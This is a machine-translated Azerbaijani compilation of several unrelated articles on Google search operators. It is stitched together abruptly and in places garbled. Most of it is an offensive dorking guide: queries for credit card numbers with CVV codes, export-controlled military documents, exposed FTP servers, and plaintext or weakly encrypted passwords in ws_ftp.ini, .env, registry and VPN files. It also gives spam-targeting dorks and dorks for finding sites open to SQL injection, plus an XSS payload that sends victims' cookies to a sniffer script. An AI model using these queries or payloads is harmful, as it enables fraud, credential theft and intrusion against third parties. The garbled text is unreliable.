Inurl odna stat php id multiverb. PHP: Miras

Hər bir operator üçün daha qısa adı olan yüngül versiya var (hamısı prefiksi olmadan). Fərq ondadır ki, allinurl bütün sözlərlə əlaqə tapacaq, inurl isə yalnız onlardan birincisi ilə əlaqə tapacaq. Sorğunun ikinci və sonrakı sözləri veb səhifələrin istənilən yerində görünə bilər. inurl operatoru da oxşar məna daşıyan başqa operatordan - saytdan fərqlənir. Birincisi, həmçinin, məlum zəiflikləri olan komponentləri tapmaq üçün geniş istifadə olunan, axtarılan sənədə keçiddə (məsələn, /cgi-bin/) istənilən simvol ardıcıllığını tapmağa imkan verir.

Gəlin bunu praktikada sınayaq. Biz allintext filtrini götürürük və sorğuda yalnız iki ildən sonra (və ya onların sahibləri hamını qidalandırmaqdan yorulanda) müddəti bitəcək kredit kartlarının nömrələrinin və təsdiq kodlarının siyahısını hazırlayırıq.

Allintext: kartın nömrəsinin istifadə müddəti /2017 cvv

Xəbərlərdə gənc hakerin gizli məlumatları oğurlayaraq Pentaqonun və ya NASA-nın "serverlərinə girdiyini" oxuduğunuzda, əksər hallarda Google-dan istifadənin məhz belə bir əsas texnikasından danışırıq. Tutaq ki, bizi NASA işçilərinin siyahısı və onların əlaqə məlumatları maraqlandırır. Şübhəsiz ki, belə bir siyahı elektron formada mövcuddur. Rahatlıq üçün və ya nəzarətə görə o, təşkilatın internet saytında da ola bilər. Məntiqlidir ki, bu halda ona heç bir keçid olmayacaq, çünki o, daxili istifadə üçün nəzərdə tutulub. Belə bir faylda hansı sözlər ola bilər? Ən azı - "ünvan" sahəsi. Bütün bu fərziyyələri yoxlamaq asandır.

Inurl:nasa.gov fayl növü:xlsx "ünvan"

Bu kimi tapıntılar xoş bir toxunuşdur. Google-un vebmasterlər üçün operatorları, Şəbəkənin özü və axtarılan strukturun xüsusiyyətləri haqqında daha ətraflı məlumat həqiqətən möhkəm tutma ilə təmin edilir. Təfərrüatları bilməklə, qalan hissələrdə həqiqətən dəyərli məlumatları əldə etmək üçün nəticələri asanlıqla süzgəcdən keçirə və lazımi faylların xüsusiyyətlərini dəqiqləşdirə bilərsiniz. Burada bürokratiyanın köməyə gəlməsi gülməlidir. Təsadüfən İnternetə sızan gizli məlumatları axtarmaq üçün əlverişli olan standart formulalar istehsal edir.

Məsələn, ABŞ Müdafiə Nazirliyi tərəfindən tələb olunan Dağıtım bəyanatı möhürü sənədin yayılmasına standartlaşdırılmış məhdudiyyətlər deməkdir. A hərfi heç bir sirr olmayan ictimai buraxılışları ifadə edir; B - yalnız daxili istifadə üçün nəzərdə tutulmuşdur, C - ciddi məxfidir və s. F-ə qədər. X hərfi ayrıca seçilir ki, bu da ən yüksək səviyyəli dövlət sirrini təmsil edən xüsusilə qiymətli məlumatları qeyd edir. Bunu vəzifə başında yerinə yetirməli olanlar belə sənədləri axtarsınlar və biz özümüzü C hərfi olan fayllarla məhdudlaşdıracağıq. DoDI 5230.24 direktivinə əsasən, bu işarə ixrac nəzarətinə düşən kritik texnologiyaların təsvirini ehtiva edən sənədlərə təyin edilir. . Bu cür diqqətlə qorunan məlumatları ABŞ Ordusu üçün ayrılmış ən yüksək səviyyəli domain.mil saytlarında tapa bilərsiniz.

"PAYLAŞMA BƏYANATI C" inurl:navy.mil

Çox rahatdır ki, .mil domenində yalnız ABŞ Müdafiə Nazirliyi və onun müqavilə təşkilatlarının saytları var. Domen məhdudiyyəti olan axtarış nəticələri son dərəcə təmizdir və başlıqlar özləri üçün danışır. Rus sirlərini bu şəkildə axtarmaq praktiki olaraq faydasızdır: domains.ru və.rf-də xaos hökm sürür və bir çox silah sistemlərinin adları botanika (PP “Kiparis”, özüyeriyən silahlar “Akatsia”) və ya hətta inanılmaz ( TOS "Buratino").

.mil domenindəki saytdan istənilən sənədi diqqətlə öyrənərək, axtarışınızı dəqiqləşdirmək üçün digər markerləri görə bilərsiniz. Məsələn, "Sec 2751" ixrac məhdudiyyətlərinə istinad, bu da maraqlı texniki məlumatları axtarmaq üçün əlverişlidir. Zaman zaman bir dəfə göründüyü rəsmi saytlardan silinir, buna görə də axtarış nəticələrində maraqlı bir keçidi izləyə bilmirsinizsə, Google-un önbelleğini (keş operatoru) və ya İnternet Arxivi saytından istifadə edin.

Təsadüfən məxfilikdən çıxarılan dövlət sənədlərinə əlavə olaraq, Dropbox-dan şəxsi fayllara keçidlər və ictimai şəkildə dərc edilmiş məlumatlara “özəl” bağlantılar yaradan digər məlumat saxlama xidmətləri vaxtaşırı Google-un keşində açılır. Alternativ və evdə hazırlanmış xidmətlərlə daha da pisdir. Məsələn, aşağıdakı sorğu FTP serveri quraşdırılmış və öz marşrutlaşdırıcısından fəal şəkildə istifadə edən bütün Verizon müştəriləri üçün məlumatları tapır.

Allinurl: ftp:// verizon.net

İndi qırx mindən çox belə ağıllı insan var və 2015-ci ilin yazında onların sayı daha çox idi. Verizon.net əvəzinə hər hansı bir tanınmış provayderin adını əvəz edə bilərsiniz və nə qədər məşhur olarsa, tutma da bir o qədər böyük ola bilər. Daxili FTP server vasitəsilə siz marşrutlaşdırıcıya qoşulmuş xarici yaddaş cihazında faylları görə bilərsiniz. Adətən bu, uzaqdan iş, şəxsi bulud və ya bir növ həmyaşıd fayl yükləməsi üçün NAS-dır. Bu cür medianın bütün məzmunu Google və digər axtarış motorları tərəfindən indekslənir, beləliklə siz birbaşa keçid vasitəsilə xarici disklərdə saxlanılan fayllara daxil ola bilərsiniz.

Buluda geniş miqrasiyadan əvvəl sadə FTP serverləri uzaqdan saxlama funksiyasını yerinə yetirirdi ki, bu da çoxlu boşluqlara malikdir. Onların bir çoxu bu gün də aktualdır. Məsələn, məşhur WS_FTP Professional proqramı konfiqurasiya məlumatlarını, istifadəçi hesablarını və parolları ws_ftp.ini faylında saxlayır. Onu tapmaq və oxumaq asandır, çünki bütün qeydlər mətn formatında saxlanılır və parollar minimal qarışıqlıqdan sonra Üçlü DES alqoritmi ilə şifrələnir. Əksər versiyalarda birinci baytı atmaq kifayətdir.

WS_FTP Password Decryptor yardım proqramı və ya pulsuz veb xidmətindən istifadə edərək belə parolların şifrəsini açmaq asandır.

İxtiyari veb saytı sındırmaq haqqında danışarkən, onlar adətən CMS və ya e-ticarət proqramlarının konfiqurasiya fayllarının qeydlərindən və ehtiyat nüsxələrindən parol əldə etməyi nəzərdə tuturlar. Onların tipik quruluşunu bilirsinizsə, açar sözləri asanlıqla göstərə bilərsiniz. Ws_ftp.ini-də tapılan xətlər çox yaygındır. Məsələn, Drupal və PrestaShop-da həmişə istifadəçi identifikatoru (UID) və müvafiq parol (pwd) var və bütün məlumatlar .inc uzantılı fayllarda saxlanılır. Onları aşağıdakı kimi axtara bilərsiniz:

"pwd=" "UID=" ext:inc

SQL serverlərinin konfiqurasiya fayllarında istifadəçi adları və e-poçt ünvanları aydın mətndə saxlanılır və parol əvəzinə onların MD5 heşləri yazılır. Düzünü desək, onların şifrəsini açmaq mümkün deyil, lakin məlum hash-parol cütləri arasında uyğunluq tapa bilərsiniz.

Hələ də parol heşinqindən istifadə etməyən DBMS-lər var. Onlardan hər hansı birinin konfiqurasiya fayllarına sadəcə brauzerdə baxmaq olar.

Mətn:DB_PASSWORD fayl növü:env

Windows serverlərinin yaranması ilə konfiqurasiya fayllarının yeri qismən reyestr tərəfindən tutuldu. Siz fayl növü kimi reg-dən istifadə edərək, onun filiallarında eyni şəkildə axtarış edə bilərsiniz. Məsələn, bu kimi:

Fayl növü:reg HKEY_CURRENT_USER "Parol"=

Bəzən təsadüfən açılmış və Google-un diqqətinə düşən məlumatlardan istifadə edərək məxfi məlumatlara çatmaq olur. İdeal seçim bəzi ümumi formatda parolların siyahısını tapmaqdır. Yalnız ümidsiz insanlar hesab məlumatlarını mətn faylında, Word sənədində və ya Excel cədvəlində saxlaya bilər, lakin onların sayı həmişə kifayətdir.

Fayl növü:xls inurl:parol

Bir tərəfdən belə hadisələrin qarşısını almaq üçün çoxlu vasitələr var. Htaccess-də adekvat giriş hüquqlarını təyin etmək, CMS-i yamaq, solaxay skriptlərdən istifadə etməmək və digər boşluqları bağlamaq lazımdır. Axtarış motorlarına orada göstərilən faylları və qovluqları indeksləşdirməyi qadağan edən robots.txt istisnalarının siyahısı olan bir fayl da var. Digər tərəfdən, əgər hansısa serverdə robots.txt strukturu standartdan fərqlənirsə, onda onların orada nəyi gizlətməyə çalışdıqları dərhal aydın olur.

İstənilən saytdakı qovluqların və faylların siyahısından əvvəl standart indeksdir. Xidmət məqsədləri üçün o, başlıqda görünməli olduğundan, onun axtarışını intitle operatoru ilə məhdudlaşdırmağın mənası var. Maraqlı şeylər /admin/, /personal/, /etc/ və hətta /secret/ kataloqlarındadır.

Burada aktuallıq son dərəcə vacibdir: köhnə boşluqlar çox yavaş bağlanır, lakin Google və onun axtarış nəticələri daim dəyişir. Hətta “son saniyə” filtri (&tbs=qdr:s sorğu URL-nin sonunda) və “real vaxt” filtri (&tbs=qdr:1) arasında fərq var.

Faylın son yeniləmə tarixinin vaxt intervalı da Google tərəfindən dolayı olaraq göstərilir. Qrafik veb interfeysi vasitəsilə siz standart dövrlərdən birini (saat, gün, həftə və s.) seçə və ya tarix diapazonunu təyin edə bilərsiniz, lakin bu üsul avtomatlaşdırma üçün uyğun deyil.

Ünvan panelinin görünüşündən siz yalnız &tbs=qdr: konstruksiyasından istifadə edərək nəticələrin çıxışını məhdudlaşdırmağın bir yolunu təxmin edə bilərsiniz. Ondan sonrakı y hərfi bir il limitini təyin edir (&tbs=qdr:y), m son ayın nəticələrini, w - həftə üçün, d - ötən gün, h - son saat, n - dəqiqə üçün və s - mənə bir saniyə verin. Google-un indicə məlum etdiyi ən son nəticələr &tbs=qdr:1 filtrindən istifadə etməklə tapılır.

Ağıllı bir skript yazmağınız lazımdırsa, tarix diapazonunun Google-da Julian formatında daterange operatorundan istifadə edərək təyin olunduğunu bilmək faydalı olacaq. Məsələn, 2015-ci il yanvarın 1-dən iyulun 1-dək yüklənmiş məxfi sözü olan PDF sənədlərinin siyahısını belə tapa bilərsiniz.

Məxfi fayl növü:pdf tarix diapazonu:2457024-2457205

Aralıq fraksiya hissəsi nəzərə alınmadan Julian tarix formatında göstərilir. Onları Qriqorian təqvimindən əl ilə tərcümə etmək əlverişsizdir. Tarix çeviricisindən istifadə etmək daha asandır.

Axtarış sorğusunda əlavə operatorları göstərməklə yanaşı, onlar birbaşa keçidin mətnində göndərilə bilər. Məsələn, filetype:pdf spesifikasiyası as_filetype=pdf konstruksiyasına uyğundur. Bu, hər hansı bir aydınlıq soruşmağı asanlaşdırır. Deyək ki, yalnız Honduras Respublikasından olan nəticələrin çıxışı axtarış URL-inə cr=countryHN konstruksiyasını əlavə etməklə və yalnız Bobruisk şəhərindən - gcs=Bobruisk-dən müəyyən edilir. Tam siyahını tərtibatçı bölməsində tapa bilərsiniz.

Google-un avtomatlaşdırma vasitələri həyatı asanlaşdırmaq üçün nəzərdə tutulub, lakin onlar tez-tez problemlər yaradır. Məsələn, istifadəçinin IP-si WHOIS vasitəsilə şəhərini müəyyən etmək üçün istifadə olunur. Bu məlumatlara əsasən, Google serverlər arasında yükü tarazlaşdırmaqla yanaşı, axtarış nəticələrini də dəyişir. Bölgədən asılı olaraq eyni sorğu üçün ilk səhifədə fərqli nəticələr görünəcək və bəziləri tamamilə gizlənə bilər. gl=country direktivindən sonrakı iki hərfli kod sizə kosmopolit kimi hiss etməyə və istənilən ölkədən məlumat axtarmağa kömək edəcək. Məsələn, Hollandiyanın kodu NL-dir, lakin Vatikan və Şimali Koreyanın Google-da öz kodu yoxdur.

Çox vaxt axtarış nəticələri bir neçə təkmil filtrdən istifadə etdikdən sonra dağınıq olur. Bu halda sorğuya bir neçə istisna sözləri əlavə etməklə aydınlaşdırmaq asandır (hər birinin qarşısında mənfi işarə qoyulur). Məsələn, bank işi, adlar və dərslik çox vaxt Personal sözü ilə istifadə olunur. Beləliklə, daha təmiz axtarış nəticələri sorğunun dərslik nümunəsi ilə deyil, dəqiqləşdirilmiş bir nümunə ilə göstəriləcəkdir:

Başlıq:"Index of /Personal/" -adlar -tutorial -banking

Mürəkkəb bir haker, ehtiyac duyduğu hər şeyi təkbaşına təmin etməsi ilə fərqlənir. Məsələn, VPN əlverişli bir şeydir, lakin ya bahalı, ya da müvəqqəti və məhdudiyyətlərlə. Özünüz üçün abunə üçün qeydiyyatdan keçmək çox bahadır. Qrup abunəliklərinin olması yaxşıdır və Google-un köməyi ilə qrupun bir hissəsi olmaq asandır. Bunu etmək üçün kifayət qədər qeyri-standart PCF uzantısına və tanınan yola malik Cisco VPN konfiqurasiya faylını tapın: Program Files\Cisco Systems\VPN Client\Profiles. Bir xahiş və siz, məsələn, Bonn Universitetinin mehriban komandasına qoşulun.

Fayl növü:pcf vpn VEYA Qrup

Parollar şifrələnmiş şəkildə saxlanılır, lakin Maurice Massard artıq onların şifrəsini açmaq üçün proqram yazıb və onu thecampusgeeks.com vasitəsilə pulsuz təqdim edir.

Google yüzlərlə müxtəlif növ hücumlar və nüfuzetmə testləri həyata keçirir. Populyar proqramlara, əsas verilənlər bazası formatlarına, PHP-nin çoxsaylı zəifliklərinə, buludlara və s. təsir edən bir çox variant var. Axtardığınızı dəqiq bilmək sizə lazım olan məlumatı (xüsusilə də ictimaiyyətə açıqlamaq niyyətində olmadığınız məlumatları) tapmağı xeyli asanlaşdıracaq. Shodan maraqlı ideyalarla qidalanan yeganə deyil, indeksləşdirilmiş şəbəkə resurslarının hər bir verilənlər bazasıdır!

Yəqin ki, hər kəs Google kimi axtarış sistemindən necə istifadə edəcəyini bilir =) Amma hamı bilmir ki, xüsusi konstruksiyalardan istifadə edərək axtarış sorğusunu düzgün tərtib etsəniz, axtardığınız nəticəni çox daha səmərəli və tez əldə edə bilərsiniz =) Bu məqalədə Bunu və düzgün axtarmaq üçün nə etməli olduğunuzu göstərməyə çalışacağam

Google google.com saytında axtarış apararkən xüsusi məna daşıyan bir neçə qabaqcıl axtarış operatorunu dəstəkləyir. Tipik olaraq, bu ifadələr axtarışı dəyişdirir və ya hətta Google-a tamamilə fərqli növ axtarışlar etməyi əmr edir. Məsələn, link: construct xüsusi operator və sorğudur keçid:www.google.com sizə normal axtarış verməyəcək, əksinə google.com-a keçidi olan bütün veb səhifələri tapacaq.
alternativ sorğu növləri

keş: Sorğuya başqa sözlər daxil etsəniz, Google keşlənmiş sənəddə daxil edilmiş sözləri vurğulayacaq.
Misal üçün, önbellek:www.web saytıönbelleğe alınmış məzmunu vurğulanmış "veb" sözü ilə göstərəcək.

link: Yuxarıdakı axtarış sorğusu göstərilən sorğuya keçidləri ehtiva edən veb səhifələri göstərəcək.
Misal üçün: keçid: www.site http://www.site-ə keçidi olan bütün səhifələri göstərəcək

əlaqəli: Göstərilən veb səhifə ilə "əlaqəli" veb səhifələri göstərir.
Misal üçün, əlaqəli: www.google.com Google-un ana səhifəsinə bənzər veb səhifələri sadalayacaq.

info: Məlumat Sorğu: sorğu etdiyiniz veb səhifə haqqında Google-da olan bəzi məlumatları təqdim edəcək.
Misal üçün, məlumat: vebsayt forumumuz haqqında məlumat göstərəcək =) (Armada - Yetkin Veb Ustalar Forumu).

Digər məlumat sorğuları

müəyyən edin: Define: sorğusu ondan sonra daxil etdiyiniz sözlərin müxtəlif onlayn mənbələrdən toplanmış tərifini verəcəkdir. Tərif bütün daxil edilmiş ifadə üçün olacaq (yəni, dəqiq sorğuya bütün sözləri daxil edəcək).

səhmlər: Səhmlərlə sorğuya başlasanız: Google sorğu şərtlərinin qalan hissəsini fond simvolları kimi emal edəcək və bu simvollar üçün hazır məlumatı göstərən səhifəyə keçid verəcək.
Misal üçün, səhmlər: Intel yahoo Intel və Yahoo haqqında məlumatları göstərəcək. (Qeyd edək ki, şirkət adını deyil, son xəbər simvollarını yazmalısınız)

Sorğu dəyişdiriciləri

sayt: Sorğunuza site: daxil etsəniz, Google nəticələri həmin domendə tapdığı vebsaytlarla məhdudlaşdıracaq.
Siz həmçinin ru, org, com və s. kimi fərdi zonalar üzrə axtarış edə bilərsiniz ( sayt: com sayt:ru)

allintitle: Əgər allintitle: ilə sorğu icra etsəniz, Google nəticələri başlıqdakı bütün sorğu sözləri ilə məhdudlaşdıracaq.
Misal üçün, allintitle: google axtarışı bütün Google səhifələrini şəkillər, Bloq və s. kimi axtarışla qaytaracaq

intitle: Sorğunuza intitle: daxil etsəniz, Google nəticələri başlıqda həmin sözü olan sənədlərlə məhdudlaşdıracaq.
Misal üçün, başlıq: Biznes

allinurl: Əgər allinurl ilə sorğu işlədirsinizsə: Google nəticələri URL-dəki bütün sorğu sözləri ilə məhdudlaşdıracaq.
Misal üçün, allinurl: google axtarışı google ilə sənədləri qaytaracaq və başlıqda axtaracaq. Həmçinin, seçim olaraq siz sözləri slash (/) ilə ayıra bilərsiniz, sonra slashin hər iki tərəfindəki sözlər eyni səhifədə axtarılacaq: Nümunə allinurl: foo/bar

inurl: Sorğunuza inurl: daxil etsəniz, Google nəticələri URL-də həmin sözü olan sənədlərlə məhdudlaşdıracaq.
Misal üçün, Animasiya inurl:sayt

intext: başlıq və keçid mətnlərinə məhəl qoymayaraq yalnız göstərilən sözü axtarır və bu dəyişdiricinin törəməsi də var - allintext: i.e. Bundan əlavə, sorğudakı bütün sözlər yalnız mətndə axtarılacaq, bu da vacib ola bilər, bağlantılarda tez-tez istifadə olunan sözlərə məhəl qoymur.
Misal üçün, mətn: forum

tarix diapazonu: vaxt çərçivəsində axtarışlar (tarix aralığı:2452389-2452389), vaxtlar üçün tarixlər Julian formatındadır.

Yaxşı, və hər cür maraqlı sorğu nümunələri

Google üçün sorğuların yazılması nümunələri. Spam göndərənlər üçün

Inurl:control.guest?a=sign

Sayt:books.dreambook.com “Ana səhifənin URL-si” “Məni imzala” inurl:sign

Sayt: www.freegb.net Əsas səhifə

Inurl:sign.asp "Sims sayı"

“Mesaj:” inurl:sign.cfm “Göndərən:”

Inurl:register.php “İstifadəçi Qeydiyyatı” “Veb saytı”

Inurl:edu/qonaq kitabı “Qonaq kitabını imzala”

Inurl: "Şərh Göndər" yazısı "URL"

Inurl:/arxivlər/ "Şərhlər:" "Məlumatı xatırlayırsınız?"

“Skript və Qonaq Kitabı Yaradıb:” “URL:” “Şərhlər:”

Inurl:?action=add “phpBook” “URL”

Başlıq: "Yeni Hekayə Göndər"

Jurnallar

Inurl:www.livejournal.com/users/ mode=reply

greatestjournal.com/ mode=reply ünvanını daxil edin

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "Qonaq kitabı"

Bloqlar

Inurl:blogger.com/comment.g?”postID””anonim”

Inurl:typepad.com/ "Şərh yaz" "Şəxsi məlumatı xatırlayırsınız?"

Inurl:greatestjournal.com/community/ "Şərh yaz" "anonim posterlərin ünvanları"

“Şərh göndərin” “anonim posterlərin ünvanları” -

Başlıq: "Şərh yaz"

Inurl:pirillo.com “Şərh yaz”

Forumlar

Inurl:gate.html?"name=Forums" "rejim=cavab"

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:"members.html"

Inurl:forum/memberlist.php?"

İnsanlar hər dəfə şəxsi ahıllar haqqında danışmağa başlayanda gülməli olur.
Başlayaq ki, ahıl nədir və özəl nədir:

DORK (DORKA) - bu maskadır, başqa sözlə, axtarış sisteminə sorğudur, buna cavab olaraq sistem ünvanlarında eyni DORK olan vebsayt səhifələrinin siyahısını qaytaracaq.

Şəxsi - bir layihədə işləyən yalnız bir şəxsin və ya kiçik bir qrup insanın əldə edə biləcəyi məlumat.

İndi gəlin " ifadəsinə baxaq. Şəxsi seks ".
Müəyyən bir domen üçün saytlar tapmaq üçün sorğu göndəririksə və bu, bizə bir növ nəticə verirsə, hər kəs bunu edə bilər və buna görə də təqdim olunan məlumat gizli deyil.

Və oyun/pul/mağaza satıcıları haqqında bir az.
Bir çox insan bu tip dorks etməyi sevir:

Steam.php?q= bitcoin.php?id= minecraft.php?id=

Təsəvvür edək ki, ahıllar haqqında heç nə başa düşmürük və Google-un bizə nə qədər link verdiyini görməyə çalışaq:

Yəqin ki, dərhal beyninizdə belə fikirlər yarandı: "Xrenoviç, sən bok bilmirsən, görün nə qədər link var, insanlar praktiki olaraq pul satırlar!"
Ancaq sizə yox deyəcəyəm, çünki indi belə bir sorğunun bizə hansı bağlantıları verəcəyini görək:

Düşünürəm ki, mətləbi anladınız, indi Google operatorundan istifadə edək inurl: dəqiq axtarış üçün və gəlin görək nə çıxacaq:

Bəli, say kəskin şəkildə azaldı, sonra eyni şey. Və nəzərə alsaq ki, dublikat domenlər + ***.info/vaernamo-nyheter/dennis-steam.php planının keçidləri olacaq, onda nəticə odur ki, 5-10 ədəd alırıq.

Sizcə, neçə nəfər öz veb-saytına bu cür keçidlər əlavə edəcək?

Linkləri görmək üçün qeydiyyatdan keçməlisiniz.

"və s., bəli, əlbəttə ki, yalnız bir neçəsi.

Bu o deməkdir ki, iyrənc yazılar steam.php?id= heç bir mənası yoxdur, onda sual budur ki, hansı dorki bişirək?
Və hər şey olduqca sadədir, qapımızda mümkün qədər çox bağlantı toplamaq lazımdır. Ən çox bağlantılar formanın ən primitiv keçidindən gələcək index.php?id=

Yuxarıdakılardan belə nəticəyə gələ bilərik: ən çox istifadə olunan kataloqlara ehtiyacımız var, nəticəmiz ən yüksək olacaqdır.

Düşünürəm ki, bir çox insanlarda belə fikirlər var idi: "Yaxşı, bundan sonra bizə tematik saytlar lazımdır, bala sevənlər üçün hər cür saytlar deyil!" Yaxşı, əlbəttə, amma saytların mövzularına keçmək üçün Google operatorları ilə tanış olmalıyıq, başlayaq. Biz bütün operatorları təhlil etməyəcəyik, yalnız səhifənin təhlilində bizə kömək edəcək operatorları təhlil edəcəyik.

Bizi maraqlandıran operatorlar hansılardır:

inurl: Səhifə ünvanında göstərilən sözü ehtiva edən saytları göstərir.
Misal:
Bizə səhifənin ünvanında sözün olduğu saytlar lazımdır araba. kimi bir sorğu yaradaq inurl:səbət və bizə ünvanda araba sözünün olduğu bütün bağlantıları verəcəkdir. Bunlar. Bu tələbdən istifadə edərək, şərtlərimizə daha ciddi riayət etməyə və bizə uyğun gəlməyən keçidlərin aradan qaldırılmasına nail olduq.

mətn: səhifələr səhifənin məzmununa əsasən seçilir.
Misal:
Tutaq ki, bizə bitcoin sözlərinin yazıldığı səhifələr lazımdır. kimi bir sorğu yaradaq mətn: bitcoinİndi o, bizə bitcoin sözünün mətndə istifadə edildiyi linkləri verəcək.

intitle: başlıq teqində sorğuda göstərilən sözlərin olduğu səhifələr göstərilir, məncə, siz artıq sorğuların necə yazılmasını başa düşürsünüz, ona görə də nümunələr verməyəcəyəm.

allinanchor: operator təsvirində bizi maraqlandıran sözlər olan səhifələri göstərir.

əlaqəli: bəlkə də oxşar məzmunlu saytları təmin edən mühüm operatorlardan biridir.
Misal:
əlaqəli:exmo.com - o, bizə mübadilələr verəcək, özünüz yoxlamağa çalışın.

Yaxşı, bəlkə də bizə lazım olan bütün əsas operatorlar.

İndi bu operatorlardan istifadə edərək yolların tikintisinə keçək.

Hər qapıdan əvvəl bir inurl qoyacağıq:

Inurl:cart?id= inurl:index?id= inurl:kataloq?id=

İntext:dota2 intext:portal intext:csgo

Əgər bizə bir ifadə lazımdırsa, onda allinurl:

Allinurl: GTA SAMP...

İndi hamısını birlikdə yapışdıraq və bu görünüşü əldə edək:

Inurl:cart?id= intext:dota2 inurl:cart?id= intext:portal inurl:cart?id= intext:csgo inurl:cart?id= allinurl:GTA SAMP inurl:index?id= intext:dota2 inurl:index? id= intext:portal inurl:index?id= intext:csgo inurl:index?id= allinurl:GTA SAMP inurl:catalog?id= intext:dota2 inurl:catalog?id= intext:portal inurl:catalog?id= intext: csgo inurl:catalog?id= allinurl:GTA SAMP

Nəticədə, daha dar və dəqiq axtarışla oyun qapıları əldə etdik.
Odur ki, beyninizi istifadə edin və axtarış operatorları və açar sözlərlə bir az təcrübə edin, təhrif olunmağa və kimi iyrənclər yazmağa ehtiyac yoxdur. hochymnogoigr.php?id=

Hamınıza təşəkkür edirəm, ümid edirəm ki, bu məqalədən heç olmasa faydalı bir şey əldə etdiniz.

İnformasiya təhlükəsizliyi haqqında bir az danışmaq qərarına gəldim. Məqalə təcrübəsiz proqramçılar və Frontend inkişafı ilə yeni məşğul olmağa başlayanlar üçün faydalı olacaq. Problem nədir?

Bir çox təcrübəsiz tərtibatçı kod yazmaqla o qədər məşğul olur ki, işlərinin təhlükəsizliyini tamamilə unudurlar. Ən əsası isə SQL və XXS sorğuları kimi zəiflikləri unudurlar. Onlar həmçinin inzibati panelləri üçün asan parollar tapırlar və kobud gücə məruz qalırlar. Bu hücumlar nədir və onlardan necə qaçmaq olar?

SQL inyeksiyası verilənlər bazasına ən çox yayılmış hücum növüdür və bu, konkret DBMS üçün SQL sorğusu zamanı həyata keçirilir. Bir çox insan və hətta iri şirkətlər belə hücumlardan əziyyət çəkir. Səbəb verilənlər bazası və daha dəqiq desək, SQL sorğularını yazarkən tərtibatçı xətasıdır.

SQL injection hücumu SQL sorğularında istifadə edilən giriş məlumatlarının düzgün işlənməməsi səbəbindən mümkündür. Əgər hakerin hücumu uğurlu olarsa, siz təkcə verilənlər bazalarının məzmununu deyil, həm də parolları və administrativ panel qeydlərini itirmək riski daşıyırsınız. Və bu məlumat saytı tamamilə ələ keçirmək və ya ona geri dönməz düzəlişlər etmək üçün kifayət edəcəkdir.

Hücum PHP, ASP, Perl və digər dillərdə yazılmış skriptlərdə uğurla təkrarlana bilər. Bu cür hücumların müvəffəqiyyəti daha çox hansı DBMS-dən istifadə olunduğundan və skriptin özünün necə həyata keçirilməsindən asılıdır. Dünyada SQL inyeksiyaları üçün çox həssas saytlar var. Bunu yoxlamaq asandır. Sadəcə olaraq “dork” daxil edin - bunlar həssas saytların axtarışı üçün xüsusi sorğulardır. Onlardan bəzilərini təqdim edirik:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Onlardan necə istifadə etmək olar? Sadəcə onları Google və ya Yandex axtarış sisteminə daxil edin. Axtarış sistemi sizə yalnız həssas sayt deyil, həm də bu zəiflik haqqında səhifə verəcəkdir. Ancaq biz bununla dayanmayacağıq və səhifənin həqiqətən həssas olduğuna əmin olacağıq. Bunun üçün “id=1” dəyərindən sonra tək “‘ sitatını qoymaq kifayətdir. Bu kimi bir şey:

• inurl:games.php?id=1’

Və sayt bizə SQL sorğusu ilə bağlı xəta verəcək. Hakerimizə bundan sonra nə lazımdır?

Və sonra ona səhv səhifəsinə bu link lazımdır. Sonra zəiflik üzərində iş əksər hallarda bu hissə üçün utilitləri olan "Kali linux" paylanmasında baş verir: inyeksiya kodunu təqdim etmək və lazımi əməliyyatları yerinə yetirmək. Bu necə olacaq, sizə deyə bilmərəm. Ancaq internetdə bu barədə məlumat tapa bilərsiniz.

Bu cür hücum kuki fayllarına həyata keçirilir. İstifadəçilər də öz növbəsində onları xilas etməyi sevirlər. Niyə də yox? Onlar olmasaydı biz nə edərdik? Axı, kukilər sayəsində Vk.com və ya Mail.ru üçün parolu yüz dəfə daxil etmək məcburiyyətində deyilik. Və onlardan imtina edənlər azdır. Ancaq İnternetdə tez-tez hakerlər üçün bir qayda görünür: rahatlıq əmsalı etibarsızlıq əmsalı ilə birbaşa mütənasibdir.

XSS hücumunu həyata keçirmək üçün hakerimiz JavaScript biliklərinə ehtiyac duyur. İlk baxışdan dil çox sadə və zərərsizdir, çünki onun kompüter resurslarına çıxışı yoxdur. Haker yalnız brauzerdə JavaScript ilə işləyə bilər, lakin bu kifayətdir. Axı, əsas odur ki, kodu veb səhifəyə daxil edin.

Hücum prosesi haqqında ətraflı danışmayacağam. Bunun necə baş verdiyinin yalnız əsaslarını və mənasını sizə danışacağam.

Haker bəzi foruma və ya qonaq kitabına JS kodu əlavə edə bilər:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skriptlər bizi kodun icra olunacağı yoluxmuş səhifəyə yönləndirəcək: istər sniffer, istər bir növ saxlama, istərsə də hansısa şəkildə kukilərimizi keşdən oğurlayan istismar.

Niyə JavaScript? Çünki JavaScript veb sorğuları idarə etməkdə əladır və kukilərə girişi var. Amma skriptimiz bizi hansısa sayta aparsa, istifadəçi bunu asanlıqla fərq edər. Burada haker daha hiyləgər variantdan istifadə edir - o, sadəcə olaraq şəklin içinə kodu daxil edir.

Img=yeni Şəkil();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Biz sadəcə olaraq bir şəkil yaradırıq və skriptimizi ona ünvan kimi təyin edirik.

Bütün bunlardan özünüzü necə qorumalısınız? Bu, çox sadədir - şübhəli bağlantıları tıklamayın.

DoS (İngilis dilindən Xidmətdən imtina - denial of service) kompüter sisteminə xaker hücumudur və onun uğursuzluğuna səbəb olur. Bu, vicdanlı sistem istifadəçilərinin təqdim olunan sistem resurslarına (serverlərinə) daxil ola bilməyəcəyi şəraitin yaradılmasıdır və ya bu giriş çətinləşir. Sistemin nasazlığı, fövqəladə vəziyyətdə proqram təminatı hər hansı kritik məlumat istehsal edərsə, onun ələ keçirilməsi istiqamətində bir addım ola bilər: məsələn, versiya, proqram kodunun bir hissəsi və s. Lakin bu, çox vaxt iqtisadi təzyiq ölçüsüdür: gəlir gətirən sadə bir xidmətin itirilməsi. Provayderin hesabları və ya hücumun qarşısını almaq üçün tədbirlər cibdəki "hədəfi" əhəmiyyətli dərəcədə vurur.

DoS və DDos hücumu arasındakı fərq nədir?

